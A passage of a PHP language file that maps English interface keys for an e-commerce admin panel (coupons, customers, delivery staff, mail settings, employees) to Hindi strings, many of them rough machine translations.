'कोडकैनियन उपयोगकर्ता नाम', 'collect_coupons_from_stores_and_apply_to_get_special_discount_from_stores' => 'दुकानों से कूपन एकत्र करें और दुकानों से विशेष छूट प्राप्त करने के लिए आवेदन करें', 'collected_cash' => 'एकत्र नकदी', 'color' => 'रंग', 'color image' => 'रंग छवि', 'color wise image' => 'रंग वार', 'color_variant' => 'रंग प्रकार', 'colors' => 'रंग की', 'colour_wise_product_image' => 'रंग वार उत्पाद छवि', 'come_back_soon' => 'जल्द ही वापस आ गए', 'comission' => 'Comission', 'comment' => 'टिप्पणी', 'commission' => 'आयोग', 'commission_Earning' => 'आयोग की कमाई', 'commission_Given' => 'दी गई', 'commission_earned' => 'अर्जित आयोग', 'commission_given' => 'दी गई', 'company' => 'कंपनी', 'company_ID' => 'कंपनी आईडी', 'company_Information' => 'कारखाना की जानकारी', 'company_Name' => 'कंपनी का नाम', 'company_address' => 'कम्पनी का पता', 'company_copyright_text' => 'कंपनी कॉपीराइट पाठ', 'compare' => 'तुलना करना', 'compare_list_Removed' => 'हटाए गए सूची की तुलना करें', 'complaint' => 'शिकायत', 'complete_Registration' => 'पूरा पंजीकरण', 'complete_the_add_details_form_and_press' => 'Add विवरण फ़ॉर्म को पूरा करें और दबाएं', 'completed' => 'पुरा होना।', 'completed_Orders' => 'पूर्ण आदेश', 'completed_payments' => 'पूर्ण भुगतान', 'config_data_updated' => 'कॉन्फ़िगर डेटा अपडेट किया गया', 'configuration_invalid' => 'विन्यास अमान्य', 'configure' => 'कॉन्फ़िगर', 'configure_SMTP_settings' => 'SMTP सेटिंग्स कॉन्फ़िगर करें', 'confirm_Email' => 'ईमेल की पुष्टि करें', 'confirm_it_works_perfectly' => 'पुष्टि करें कि यह पूरी तरह से काम करता है', 'confirm_password' => 'पासवर्ड की पुष्टि कीजिये', 'confirm_your_new_password' => 'अपने नए पासवर्ड की पुष्टि करें', 'confirmed' => 'की पुष्टि', 'consumer_electronics' => 'उपभोक्ता इलेक्ट्रॉनिक्स', 'contact' => 'संपर्क', 'contact info' => 'संपर्क सूचना', 'contact_Info' => 'संपर्क सूचना', 'contact_List' => 'संपर्क सूची', 'contact_Person_Name' => 'संपर्क व्यक्ति का नाम', 'contact_Us' => 'संपर्क करें', 'contact_With_Seller' => 'विक्रेता के साथ संपर्क', 'contact_bold' => 'संपर्क बोल्ड', 'contact_deleted_successfully' => 'संपर्क को सफलतापूर्वक हटा दिया गया', 'contact_info' => 'संपर्क सूचना', 'contact_number' => 'संपर्क संख्या', 'contact_person_name' => 'संपर्क व्यक्ति का नाम', 'contact_us' => 'संपर्क करें', 'contact_with_seller' => 'विक्रेता के साथ संपर्क', 'contact_with_support_team' => 'समर्थन टीम के साथ संपर्क', 'contact_your_email_service_provider_or_IT_administrator_to_obtain_the_SMTP_server_details_such_as_hostname_port_username_and_password' => 'SMTP सर्वर विवरण जैसे HostName पोर्ट उपयोगकर्ता नाम और पासवर्ड प्राप्त करने के लिए अपने ईमेल सेवा प्रदाता या IT व्यवस्थापक से संपर्क करें', 'contacts' => 'संपर्क', 'continue' => 'जारी रखना', 'continue_shopping' => 'खरीदारी जारी रखें', 'convert_point_to_wallet_money' => 'बटुए के पैसे में प्वाइंट कन्वर्ट करें', 'convert_to_currency' => 'मुद्रा में परिवर्तित करें', 'convert_your_loyalty_point_to_wallet_money.' => 'अपने वफादारी बिंदु को बटुए के पैसे में बदलें।', 'convert_your_loyalty_points_into_wallet_money' => 'अपने वफादारी बिंदुओं को बटुए के पैसे में बदलें', 'converted_amount' => 'परिवर्तित राशि', 'converted_from_loyalty_point' => 'वफादारी बिंदु से परिवर्तित', 'cookie_Settings' => 'कुकी सेटिंग्स', 'cookie_setting' => 'कुकी सेटिंग', 'cookie_settings' => 'कुकी सेटिंग्स', 'cookie_text' => 'कुकी पाठ', 'cookies' => 'कुकीज़', 'copied' => 'कॉपी किया गया', 'copied_failed' => 'कॉपी विफल', 'copied_to_the_clipboard' => 'क्लिपबोर्ड पर कॉपी किया गया', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'नीचे दिए गए इनपुट में साइट कुंजी और गुप्त कुंजी पेस्ट कॉपी करें और सहेजें।', 'copy_URI' => 'कॉपीरी', 'copy_path' => 'प्रतिलिपि पथ', 'copy_right' => 'कॉपी राइट', 'copy_the_latitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'Google मानचित्र से अपने व्यावसायिक स्थान के अक्षांश को कॉपी करें और इसे यहां पेस्ट करें', 'copy_the_longitude_of_your_business_location_from_Google_Maps_and_paste_it_here' => 'Google मैप्स से अपने व्यावसायिक स्थान के देशांतर को कॉपी करें और इसे यहां पेस्ट करें', 'copy_your_code_and_share_your_friends' => 'अपने कोड की प्रतिलिपि बनाएँ और अपने दोस्तों को साझा करें', 'copyright' => 'कॉपीराइट', 'cost' => 'लागत', 'cost_per_product' => 'प्रति उत्पाद लागत', 'country' => 'देश', 'country_code' => 'कंट्री कोड', 'country_code_is_must' => 'देश कोड होना चाहिए', 'country_code_is_must_like_for_BD' => 'देश कोड को बीडी के लिए पसंद करना चाहिए', 'country_name' => 'देश नाम', 'coupon' => 'कूपन', 'coupon_Add' => 'कूपन जोड़ें', 'coupon_Discount' => 'कूपन छूट', 'coupon_Discount_Amount' => 'कूपन छूट राशि', 'coupon_Edit' => 'कूपन संपादित करना', 'coupon_added_successfully' => 'कूपन ने सफलतापूर्वक जोड़ा', 'coupon_applied_successfully' => 'कूपन ने सफलतापूर्वक लागू किया', 'coupon_bearer' => 'कूपन वाहक', 'coupon_bearer_is_required' => 'कूपन बियरर की आवश्यकता है', 'coupon_bearer_is_required!' => 'कूपन बियरर की आवश्यकता है!', 'coupon_code' => 'कूपन कोड', 'coupon_discount' => 'कूपन छूट', 'coupon_discount_amount' => 'कूपन छूट राशि', 'coupon_discount_will_be_shown_here' => 'कूपन छूट यहां दिखाई जाएगी', 'coupon_form' => 'कूपन फॉर्म', 'coupon_is_invalid' => 'कूपन अमान्य है', 'coupon_list' => 'कूपन सूची', 'coupon_setup' => 'कूपन सेटअप', 'coupon_title' => 'कूपन शीर्षक', 'coupon_type' => 'कूपन प्रकार', 'coupon_update' => 'कूपन अद्यतन', 'coupons' => 'कूपन', 'coupons_table' => 'कूपन टेबल', 'create' => 'बनाएं', 'create_App' => 'ऐप बनाएँ', 'create_a_support_tickets' => 'एक समर्थन टिकट बनाएं', 'create_a_unique_product_code_by_clicking_on_the_âGenerate_Codeâ_button' => 'Code जेनरेट कोड बटन पर क्लिक करके एक अद्वितीय उत्पाद कोड बनाएं', 'create_credentials' => 'क्रेडेंशियल्स बनाएं', 'create_support_tickets' => 'समर्थन टिकट बनाएं', 'create_your_own_business' => 'अपना खुद का व्यवसाय बनाएं', 'create_your_own_store.' => 'अपना खुद का स्टोर बनाएं।', 'created_at' => 'पर बनाया गया', 'credential_setup' => 'साख सेटअप', 'credential_updated' => 'साख अद्यतन', 'credentials' => 'साख', 'credentials_SetUp_page' => 'साख सेटअप पृष्ठ', 'credentials_do_not_match_or_account_has_been_suspended' => 'क्रेडेंशियल्स मैच नहीं करते हैं या खाता निलंबित कर दिया गया है', 'credit' => 'श्रेय', 'currencies' => 'मुद्राओं', 'currency' => 'मुद्रा', 'currency_Position' => 'मुद्रा स्थिति', 'currency_changed_to' => 'मुद्रा में बदल गई', 'currency_code' => 'मुद्रा कोड', 'currency_name' => 'मुद्रा नाम', 'currency_symbol' => 'मुद्रा चिन्ह', 'current_Stock' => 'वर्तमान स्टॉक', 'current_Stock_Amount' => 'चालू स्टॉक राशि', 'current_customer' => 'वर्तमान ग्राहक', 'current_stock' => 'वर्तमान स्टॉक', 'current_stock_qty' => 'वर्तमान स्टॉक qty', 'current_value_is' => 'वर्तमान मूल्य है', 'currently_you_are_managing_banners_for_' => 'वर्तमान में आप के लिए बैनर का प्रबंधन कर रहे हैं', 'custom' => 'रिवाज़', 'custom_Date' => 'कस्टम तिथि', 'custom_date' => 'कस्टम तिथि', 'custom_role' => 'कस्टम भूमिका', 'customer' => 'ग्राहक', 'customer Name' => 'ग्राहक का नाम', 'customer added successfully' => 'ग्राहक ने सफलतापूर्वक जोड़ा', 'customer wallet' => 'ग्राहक बटुआ', 'customer wallet hist...' => 'ग्राहक बटुआ हिस्ट ...', 'customer wallets' => 'ग्राहक बटुए', 'customer_Details' => 'ग्राहक विवरण', 'customer_ID' => 'ग्राहक आईडी', 'customer_Info' => 'ग्राहक की जानकारी', 'customer_Information' => 'ग्राहक सूचना', 'customer_List' => 'ग्राहकू सूची', 'customer_Loyalty_Point' => 'ग्राहक वफादारी बिंदु', 'customer_Loyalty_Point_Settings' => 'ग्राहक वफादारी बिंदु सेटिंग्स', 'customer_Name' => 'ग्राहक का नाम', 'customer_Referrer_Earning' => 'ग्राहक रेफ़रर कमाई', 'customer_Referrer_Settings' => 'ग्राहक रेफरर सेटिंग्स', 'customer_Reviews' => 'ग्राहक समीक्षा', 'customer_Wallet' => 'ग्राहक बटुआ', 'customer_Wallet_Settings' => 'ग्राहक बटुआ सेटिंग्स', 'customer_details' => 'ग्राहक विवरण', 'customer_id' => 'ग्राहक आईडी', 'customer_info' => 'ग्राहक की जानकारी', 'customer_information' => 'ग्राहक सूचना', 'customer_list' => 'ग्राहकू सूची', 'customer_loyalty_point' => 'ग्राहक वफादारी बिंदु', 'customer_loyalty_point_report' => 'ग्राहक वफादारी बिंदु रिपोर्ट', 'customer_message' => 'ग्राहक संदेश', 'customer_message_table' => 'ग्राहक संदेश तालिका', 'customer_name' => 'ग्राहक का नाम', 'customer_not_found' => 'ग्राहक नहीं मिला', 'customer_one' => 'ग्राहक एक', 'customer_referrer_earning' => 'ग्राहक रेफ़रर कमाई', 'customer_removed' => 'ग्राहक हटा दिया', 'customer_reviews' => 'ग्राहक समीक्षा', 'customer_settings' => 'ग्राहक सेटिंग्स', 'customer_settings_updated_successfully' => 'ग्राहक सेटिंग्स को सफलतापूर्वक अपडेट किया गया', 'customer_two' => 'ग्राहक दो', 'customer_verify' => 'ग्राहक सत्यापित करें', 'customer_wallet' => 'ग्राहक बटुआ', 'customer_wallet_bonus_edit' => 'ग्राहक वॉलेट बोनस संपादित करें', 'customer_wallet_bonus_setup' => 'ग्राहक बटुआ बोनस सेटअप', 'customer_wallet_settings' => 'ग्राहक बटुआ सेटिंग्स', 'customer_will_get_extra_amount_to_his_or_her_wallet_additionally_with_the_amount_he_or_she_added_from_other_payment_gateways' => 'ग्राहक को उसके बटुए को अतिरिक्त राशि मिलेगी, इसके अलावा वह अन्य भुगतान गेटवे से जोड़ा गया था', 'customers' => 'ग्राहकों', 'customers_receive_a_verification_code_after_placing_an_order' => 'ग्राहकों को एक आदेश देने के बाद एक सत्यापन कोड प्राप्त होता है', 'customers_settings' => 'ग्राहक सेटिंग्स', 'customers_will_download_the_latest_customer_app_version_using_this_URL' => 'ग्राहक इस URL का उपयोग करके नवीनतम ग्राहक ऐप संस्करण डाउनलोड करेंगे', 'dark' => 'अँधेरा', 'dashboard' => 'चकरानेवाला', 'dashboard_order_statistics' => 'डैशबोर्ड ऑर्डर सांख्यिकी', 'data' => 'डेटा', 'database' => 'डेटाबेस', 'date' => 'तारीख', 'date_Submitted' => 'प्रस्तुत दिनांक', 'date_type' => 'दिनांक प्रकार', 'day' => 'दिन', 'day_limit' => 'दिन की सीमा', 'days' => 'दिन', 'days_after_delivery' => 'प्रसव के बाद', 'days_free_delivery' => 'दिन मुफ्त वितरण', 'deactive' => 'Deactive', 'deactive all seller product' => 'सभी विक्रेता उत्पाद को निष्क्रिय कर दें', 'deactive all seller!!' => 'Deactive सभी विक्रेता !!', 'deal of the days' => 'दिनों का सौदा', 'deal_Of_The_Day' => 'दिन का एक सौदा', 'deal_Product' => 'सौदा उत्पाद', 'deal_form' => 'सौदा प्रपत्र', 'deal_of_the_day' => 'दिन का एक सौदा', 'debit' => 'खर्चे में लिखना', 'decimal_point_settings' => 'दशमलव बिंदु सेटिंग्स', 'default' => 'गलती करना', 'default currency can not be deleted!' => 'डिफ़ॉल्ट मुद्रा को हटाया नहीं जा सकता है!', 'default currency can not be deleted!to delete change the default currency first!' => 'डिफ़ॉल्ट मुद्रा को हटाया नहीं जा सकता है! पहले डिफ़ॉल्ट मुद्रा को बदलने के लिए!', 'default language can not be deleted! to delete change the default language first!' => 'डिफ़ॉल्ट भाषा को हटाया नहीं जा सकता है! पहले डिफ़ॉल्ट भाषा को बदलने के लिए पहले!', 'default language can not be deleted!to delete change the default language first!' => 'डिफ़ॉल्ट भाषा को हटाया नहीं जा सकता है! पहले डिफ़ॉल्ट भाषा को बदलने के लिए!', 'default_Method_updated_failed' => 'डिफ़ॉल्ट विधि अद्यतन विफल', 'default_Method_updated_successfully' => 'डिफ़ॉल्ट विधि सफलतापूर्वक अपडेट की गई', 'default_commission' => 'डिफ़ॉल्ट आयोग', 'default_commission (%)' => 'डिफ़ॉल्ट आयोग (%)', 'default_language_can_not_be_deactive' => 'डिफ़ॉल्ट भाषा निष्क्रिय नहीं हो सकती है', 'default_language_can_not_be_deleted' => 'डिफ़ॉल्ट भाषा को हटाया नहीं जा सकता है', 'default_method' => 'डिफ़ॉल्ट विधि', 'default_sort' => 'डिफ़ॉल्ट क्रम', 'default_status' => 'डिफ़ॉल्ट स्थिति', 'delete' => 'मिटाना', 'delete it' => 'इसे हटा', 'delete_account' => 'खाता हटा दो', 'delete_it' => 'इसे हटा', 'delete_profile' => 'प्रोफ़ाइल हटाएं', 'deleted!' => 'हटा दिया!', 'delivered' => 'पहुंचा दिया', 'delivered_By' => 'द्वारा वितरित', 'delivered_by' => 'द्वारा वितरित', 'delivery' => 'वितरण', 'delivery histories' => 'प्रसव इतिहास', 'delivery man transac...' => 'डिलीवरी मैन ट्रांसक ...', 'delivery men' => 'वितरक पुरुषों', 'delivery zip codes' => 'वितरण ज़िप कोड', 'delivery-Man' => 'डिलीवरी मैन', 'delivery-man' => 'डिलीवरी मैन', 'delivery_Charge' => 'वितरण शुल्क', 'delivery_Man' => 'डिलीवरी मैन', 'delivery_Man_Settings' => 'डिलीवरी मैन सेटिंग्स', 'delivery_Restriction' => 'वितरण प्रतिबंध', 'delivery_address' => 'डिलिवरी का पता', 'delivery_available_country' => 'उपलब्ध देश', 'delivery_available_zip_code_area' => 'उपलब्ध ज़िप कोड क्षेत्र', 'delivery_charge' => 'वितरण शुल्क', 'delivery_charge_earned' => 'अर्जित डिलीवरी चार्ज', 'delivery_country_added_successfully' => 'वितरण देश ने सफलतापूर्वक जोड़ा', 'delivery_country_deleted_successfully' => 'डिलीवरी देश सफलतापूर्वक हटा दिया गया', 'delivery_country_restriction_status_changed_successfully' => 'वितरण देश प्रतिबंध की स्थिति सफलतापूर्वक बदल गई', 'delivery_fee' => 'वितरण शुल्क', 'delivery_fee_discount' => 'वितरण शुल्क छूट', 'delivery_info' => 'प्रसव की जानकारी', 'delivery_information_details' => 'वितरण सूचना विवरण', 'delivery_man' => 'डिलीवरी मैन', 'delivery_man_app_version_control' => 'डिलीवरी मैन ऐप संस्करण नियंत्रण', 'delivery_man_info' => 'डिलीवरी मैन जानकारी', 'delivery_man_management' => 'सुपुर्दगी प्रबंध प्रबंधन', 'delivery_man_name' => 'डिलीवरी मैन का नाम', 'delivery_man_phone' => 'डिलीवरी मैन फोन', 'delivery_man_successfully_assigned/changed' => 'डिलीवरी मैन सफलतापूर्वक असाइन किया गया/बदल गया', 'delivery_man_successfully_assigned_or_changed' => 'डिलीवरी मैन को सफलतापूर्वक सौंपा या बदल दिया गया', 'delivery_restriction' => 'वितरण प्रतिबंध', 'delivery_service_name' => 'वितरण सेवा नाम', 'delivery_to_country' => 'देश को वितरण', 'delivery_to_zip_code_area' => 'ज़िप कोड क्षेत्र को वितरण', 'delivery_type' => 'वितरण के प्रकार', 'delivery_zip_code_deleted_successfully' => 'डिलीवरी ज़िप कोड सफलतापूर्वक हटा दिया गया', 'delivery_zip_code_restriction_status_changed_successfully' => 'डिलीवरी ज़िप कोड प्रतिबंध स्थिति सफलतापूर्वक बदल गई', 'deliveryman' => 'डिलीवरी मैन', 'deliveryman notifica...' => 'डिलीवरीमैन नोटिफिकेशन ...', 'deliveryman wallets' => 'डिलीवरीमैन बटुए', 'deliveryman_List' => 'डिलीवरीमैन सूची', 'deliveryman_can_not_assign_or_change_in_that_status' => 'डिलीवरीमैन उस स्थिति में असाइन या परिवर्तन नहीं कर सकता है', 'deliveryman_charge_add_successfully' => 'डिलीवरीमैन चार्ज सफलतापूर्वक जोड़ें', 'deliveryman_email' => 'डिलीवरीमैन ईमेल', 'deliveryman_image' => 'डिलीवरीमैन इमेज', 'deliveryman_info' => 'डिलीवरीमैन जानकारी', 'deliveryman_man_can_not_assign/change_in_that_status' => 'डिलीवरीमैन मैन उस स्थिति में असाइन/परिवर्तन नहीं कर सकता', 'deliveryman_man_can_not_assign_or_change_in_that_status' => 'डिलीवरीमैन मैन उस स्थिति में असाइन या बदल नहीं सकता है', 'deliveryman_name' => 'डिलीवरीमैन नाम', 'deliveryman_phone' => 'डिलीवरीमैन फोन', 'deliveryman_review' => 'डिलीवरीमैन की समीक्षा', 'deliveryman_will_get' => 'डिलीवरीमैन मिलेगा', 'deliverymen_will_download_the_latest_deliveryman_app_version_using_this_URL' => 'डिलीवरीमैन इस URL का उपयोग करके नवीनतम डिलीवरीमैन ऐप संस्करण डाउनलोड करेंगे', 'deneid' => 'बालू के टीले', 'deneied' => 'गूढ़', 'denied' => 'अस्वीकृत', 'denied_Products' => 'अस्वीकार उत्पाद', 'denied_note' => 'वंचित नोट', 'deny' => 'अस्वीकार करना', 'describe_your_issue' => 'अपने मामले का वर्णन करें', 'description' => 'विवरण', 'details' => 'विवरण', 'details_Description' => 'विवरण विवरण', 'dev' => 'देव', 'dhaka' => 'ढाका', 'digit_after_decimal_point' => 'दशमलव बिंदु के बाद अंक', 'digital' => 'डिजिटल', 'digital product' => 'अंकीय उत्पाद', 'digital_Payments' => 'अंकीय भुगतान', 'digital_file_ready' => 'डिजिटल फ़ाइल तैयार', 'digital_payment' => 'अंकीय भुगतान', 'digital_payments' => 'अंकीय भुगतान', 'digital_product_type' => 'अंकीय उत्पाद प्रकार', 'digitally paid' => 'डिजिटल रूप से भुगतान किया हुआ', 'digitally_paid' => 'डिजिटल रूप से भुगतान किया हुआ', 'digitaly_paid' => 'डिजिटल भुगतान', 'direction' => 'दिशा', 'disabled' => 'अक्षम', 'disabling_SMTP_mail_configuration_services_stops_email_sending' => 'SMTP मेल कॉन्फ़िगरेशन सेवाओं को अक्षम करना ईमेल भेजना बंद कर देता है', 'disabling_sendgrid_mail_configuration_services_stops_email_sending' => 'सेंडग्रिड मेल कॉन्फ़िगरेशन सेवाओं को अक्षम करना ईमेल भेजना बंद कर देता है', 'disburse' => 'चुकाना', 'discount' => 'छूट', 'discount on purchase' => 'खरीद पर छूट', 'discount_Amount' => 'छूट राशि', 'discount_Given' => 'दी गई छूट', 'discount_Type' => 'छूट प्रकार', 'discount_amount' => 'छूट राशि', 'discount_amount_is_required' => 'छूट राशि की आवश्यकता है', 'discount_amount_is_required!' => 'छूट राशि की आवश्यकता है!', 'discount_bearer' => 'छूट वाहक', 'discount_given' => 'दी गई छूट', 'discount_on_Purchase' => 'खरीद पर छूट', 'discount_on_product' => 'उत्पाद की छूट', 'discount_on_purchase_and_first_delivery_coupon_amount_will_be_shown_here' => 'खरीद पर छूट और पहली डिलीवरी कूपन राशि यहां दिखाई जाएगी', 'discount_type' => 'छूट प्रकार', 'discount_type_is_required' => 'डिस्काउंट प्रकार की आवश्यकता है', 'discount_type_is_required!' => 'डिस्काउंट प्रकार की आवश्यकता है!', 'discounted' => 'रियायती', 'discounted_Amount' => 'रियायती राशि', 'discounted_amount' => 'रियायती राशि', 'discounted_products' => 'रियायती उत्पाद', 'display_name' => 'प्रदर्शित होने वाला नाम', 'do_not_have_the_template' => 'टेम्पलेट नहीं है', 'do_you_want_to_change_in_addon_status' => 'क्या आप Addon स्थिति में बदलना चाहते हैं', 'do_you_want_to_delete_this' => 'क्या आप इसे हटाना चाहते हैं', 'do_you_want_to_logout' => 'क्या आप लॉगआउट करना चाहते हैं', 'do_you_want_to_shift_in_another_theme' => 'क्या आप किसी अन्य थीम में शिफ्ट करना चाहते हैं', 'domain' => 'कार्यक्षेत्र', 'donât_miss_todays_deal' => 'डॉन टी मिस टोड्स डील', 'don’t_miss_todays_deal' => 'Don’t miss todays deal', 'download' => 'Download', 'download_PDF' => 'डाउनलोड पीडीऍफ़', 'download_URL_For_Customer_App' => 'ग्राहक ऐप के लिए URL डाउनलोड करें', 'download_URL_For_Deliveryman_App' => 'डिलीवरीमैन ऐप के लिए URL डाउनलोड करें', 'download_URL_For_Seller_App' => 'विक्रेता ऐप के लिए URL डाउनलोड करें', 'download_here' => 'यहाँ डाउनलोड करें', 'download_link' => 'लिंक को डाउनलोड करें', 'download_our_app' => 'हमारे ऐप डाउनलोड करें', 'download_the_file_in_device_named' => 'फ़ाइल को डिवाइस में डाउनलोड करें', 'download_the_format_file_and_fill_it_with_proper_data.' => 'प्रारूप फ़ाइल डाउनलोड करें और इसे उचित डेटा से भरें।', 'drag_&_drop_file_or_browse_file' => 'फाइल को ड्रैग एंड ड्रॉप करें या फाइल ब्राउज़ करें', 'driver' => 'चालक', 'driving' => 'ड्राइविंग', 'driving_License' => 'ड्राइविंग लाइसेंस', 'drop_here' => 'यहां छोड़ें', 'due_Amount' => 'बकाया राशि', 'duration' => 'अवधि', 'eBook' => 'ई-पुस्तक', 'earn_From_Order' => 'आदेश से कमाएं', 'earn_From_Shipping' => 'शिपिंग से कमाएं', 'earn_money _o_your_wallet_by_completing_the_offer_&_challenged' => 'ऑफ़र को पूरा करके अपने बटुए को पैसे कमाएं और चुनौती दी', 'earned_by_referral' => 'रेफरल द्वारा अर्जित किया गया', 'earning' => 'कमाई', 'earning_From_Shipping' => 'शिपिंग से कमाई', 'earning_Reports' => 'अर्जित रिपोर्ट', 'earning_Statistics' => 'अर्जित आंकड़े', 'earning_statistics' => 'अर्जित आंकड़े', 'earning_statistics_for_business_analytics' => 'व्यापार विश्लेषण के लिए सांख्यिकी अर्जित करना', 'earnings' => 'आय', 'earnings_to_Each_Referral' => 'प्रत्येक रेफरल में कमाई', 'ebooks' => 'ई बुक्स', 'ecommerce' => 'ई-कॉमर्स', 'edit' => 'संपादन करना', 'edit_Customer' => 'ग्राहक संपादित करें', 'edit_Offline_Payment_Method' => 'ऑफ़लाइन भुगतान विधि संपादित करें', 'edit_address' => 'पता संपादित करें', 'edit_most_demanded' => 'सबसे अधिक मांग संपादित करें', 'edit_products' => 'उत्पाद संपादित करें', 'edit_profile' => 'प्रोफ़ाइल संपादित करें', 'edit_shop' => 'संपादित दुकान', 'electronics' => 'इलेक्ट्रानिक्स', 'email' => 'ईमेल', 'email_ID' => 'ईमेल आईडी', 'email_Verification' => 'ईमेल सत्यापन', 'email_address' => 'मेल पता', 'email_already_has_been_taken' => 'ईमेल पहले से ही लिया जा चुका है', 'email_configuration_error' => 'ईमेल कॉन्फ़िगरेशन त्रुटि', 'email_configured_perfectly' => 'ईमेल पूरी तरह से कॉन्फ़िगर किया गया', 'email_failed' => 'ईमेल विफल', 'email_id' => 'ईमेल आईडी', 'email_not_found' => 'ईमेल नहीं मिला', 'email_status_is_not_active' => 'ईमेल की स्थिति सक्रिय नहीं है', 'email_templates' => 'ईमेल टेम्प्लेट', 'email_verification' => 'ईमेल सत्यापन', 'emergency contacts' => 'आपातकालीन संपर्क', 'emergency_Contact' => 'आपातकालीन संपर्क', 'emergency_contact' => 'आपातकालीन संपर्क', 'employee_Login_Page' => 'कर्मचारी लॉगिन पृष्ठ', 'employee_Role_Setup' => 'कर्मचारी भूमिका -सेटअप', 'employee_add' => 'कर्मचारी जोड़ें', 'employee_form' => 'कर्मचारी रूप', 'employee_image' => 'कर्मचारी छवि', 'employee_list' => 'कर्मचारी सूची', 'employee_login_url' => 'कर्मचारी लॉगिन url', 'employee_role' => 'कर्मचारी भूमिका', 'employee_section' => 'कर्मचारी अनुभाग', 'employee_table' => 'कर्मचारी सारणी', 'employees' => 'कर्मचारी', 'empty' => 'खाली', 'empty_Cart' => 'खाली गाड़ी', 'empty_cart' => 'खाली गाड़ी', 'enable_POS_in_Seller_Panel' => 'विक्रेता पैनल में POS सक्षम करें', 'enable_mail_configuration' => 'मेल कॉन्फ़िगरेशन सक्षम करें', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_SMTP_settings_to_avoid_potential_issues_with_email_delivery' => 'मेल कॉन्फ़िगरेशन सेवाओं को सक्षम करने से सिस्टम को ईमेल भेजने की अनुमति मिलेगी। कृपया सुनिश्चित करें कि आपने ईमेल डिलीवरी के साथ संभावित मुद्दों से बचने के लिए SMTP सेटिंग्स को सही ढंग से कॉन्फ़िगर किया है', 'enabling_mail_configuration_services_will_allow_the_system_to_send_emails.Please_ensure_that_you_have_correctly_configured_the_sendgrid_settings_to_avoid_potential_issues_with_email_delivery' => 'मेल कॉन्फ़िगरेशन सेवाओं को सक्षम करने से सिस्टम को ईमेल भेजने की अनुमति मिलेगी। कृपया सुनिश्चित करें कि आपने ईमेल डिलीवरी के साथ संभावित मुद्दों से बचने के लिए सेंडग्रिड सेटिंग्स को सही ढंग से कॉन्फ़िगर किया है', 'encryption' => 'कूटलेखन', 'end' => 'अंत', 'end Date' => 'अंतिम तिथि', 'end_Date' => 'अंतिम तिथि', 'end_date' => 'अंतिम तिथि', 'enjoy_new_experience' => 'नए अनुभव का आनंद लें', 'enter_Attribute_Name' => 'विशेषता नाम दर्ज करें', 'enter_Social_Media_Link' => 'सोशल मीडिया लिंक दर्ज करें', 'enter_captcha_value' => 'कैप्चा मान दर्ज करें', 'enter_choice_values' => 'विकल्प मान दर्ज करें', 'enter_email' => 'ईमेल दर्ज करें', 'enter_email_address' => 'ईमेल पता दर्ज करें', 'enter_email_address_or_phone_number' => 'ईमेल पता या फ़ोन नंबर दर्ज करें', 'enter_email_or_phone_number' => 'ईमेल या फ़ोन नंबर दर्ज करें', 'enter_mailer_name' => 'मेलर नाम दर्ज करें', 'enter_name' => 'नाम दर्ज करें', 'enter_new_email_address' => 'नया ईमेल पता दर्ज करें', 'enter_new_password' => 'नया पासवर्ड दर्ज करें', 'enter_password' => 'पास वर्ड दर्ज करें', 'enter_phone_number' => 'फोन नंबर दर्ज', 'enter_tag' => 'टैग दर्ज करें', 'enter_the_driver_for_your_mailing_service' => 'अपनी मेलिंग सेवा के लिए ड्राइवर दर्ज करें', 'enter_the_encryption_type' => 'एन्क्रिप्शन प्रकार दर्ज करें', 'enter_the_name_of_the_host_of_your_mailing_service' => 'अपनी मेलिंग सेवा के होस्ट का नाम दर्ज करें', 'enter_the_obtained_SMTP_server_details _including_the_hostname _port _username _and password' => 'HostName पोर्ट उपयोगकर्ता नाम और पासवर्ड सहित प्राप्त SMTP सर्वर विवरण दर्ज करें', 'enter_the_port_number_for_your_mailing_service' => 'अपनी मेलिंग सेवा के लिए पोर्ट नंबर दर्ज करें', 'enter_the_username_of_your_account' => 'अपने खाते का उपयोगकर्ता नाम दर्ज करें', 'enter_url' => 'यू आर एल दर्ज करो', 'enter_your_email' => 'अपना ईमेल दर्ज करें', 'enter_your_email_ID' => 'अपना ईमेल आईडी दर्ज करें', 'enter_your_email_address' => 'अपना ईमेल पता दर्ज करें', 'enter_your_order_ID_& _phone_to_get_delivery_updates' => 'डिलीवरी अपडेट प्राप्त करने के लिए अपना ऑर्डर आईडी और फ़ोन दर्ज करें', 'enter_your_password' => 'अपना कूटशब्द भरें', 'enter_zip_code' => 'ज़िप कोड डालें', 'enters_point_amount' => 'बिंदु राशि में प्रवेश करता है', 'environment' => 'पर्यावरण', 'environment_Information' => 'पर्यावरण सूचना', 'environment_setup' => 'पर्यावरणीय सेटअप', 'equivalent_Point_to_1_Unit_Currency' => '1 इकाई मुद्रा के बराबर बिंदु', 'erfe' => 'एर्फ़', 'error' => 'गलती', 'estimated_Delivary_Date' => 'Estimated Delivary Date', 'estimated_delivery_date' => 'अनुमानित प्रसव तिथि', 'everything_will_be_rearranged' => 'सब कुछ पुनर्व्यवस्थित किया जाएगा', 'ex' => 'पूर्व', 'ex =>' => 'पूर्व =>', 'ex => 123456' => 'Ex=> 123456', 'ex => Alex' => 'Ex=> एलेक्स', 'ex => ex@yahoo.com' => 'Ex=> ex@yahoo.com', 'ex => tls' => 'Ex=> TLS', 'ex => yahoo' => 'Ex=> याहू', 'ex:' => 'Ex:', 'ex=>' => 'पूर्व=>', 'ex=> 0.00' => 'Ex=> 0.00', 'ex=> 2.1' => 'पूर्व=> २.१', 'ex=> 49679646444789dsf64f64f6' => 'Ex=> 49679646444789DSF64F64F6', 'ex=> 5' => 'पूर्व=> ५', 'ex=> 587' => 'Ex=> 587', 'ex=> 70' => 'पूर्व=> 70', 'ex=> dhaka' => 'Ex=> dhaka', 'ex=> f64f6' => 'Ex=> F64F6', 'ex=> mail.google.one' => 'Ex=> mail.google.one', 'ex=> salam' => 'पूर्व=> सलाम', 'ex=>0.00' => 'Ex=> 0.00', 'ex_:_7+_character' => 'Ex : 7+ character', 'ex_=>_7+_character' => 'पूर्व=> 7+ चरित्र', 'ex_=>_8+_character' => 'Ex=> 8+ चरित्र', 'example@example.com' => 'Example@example.com', 'excel' => 'एक्सेल', 'excellent' => 'उत्कृष्ट', 'exchange_rate' => 'विनिमय दर', 'exclude' => 'निकालना', 'exclude_with_product' => 'उत्पाद के साथ बाहर करें', 'expand_Menu' => 'मेनू का विस्तार करें', 'expand_cart' => 'कार्ट का विस्तार करें', 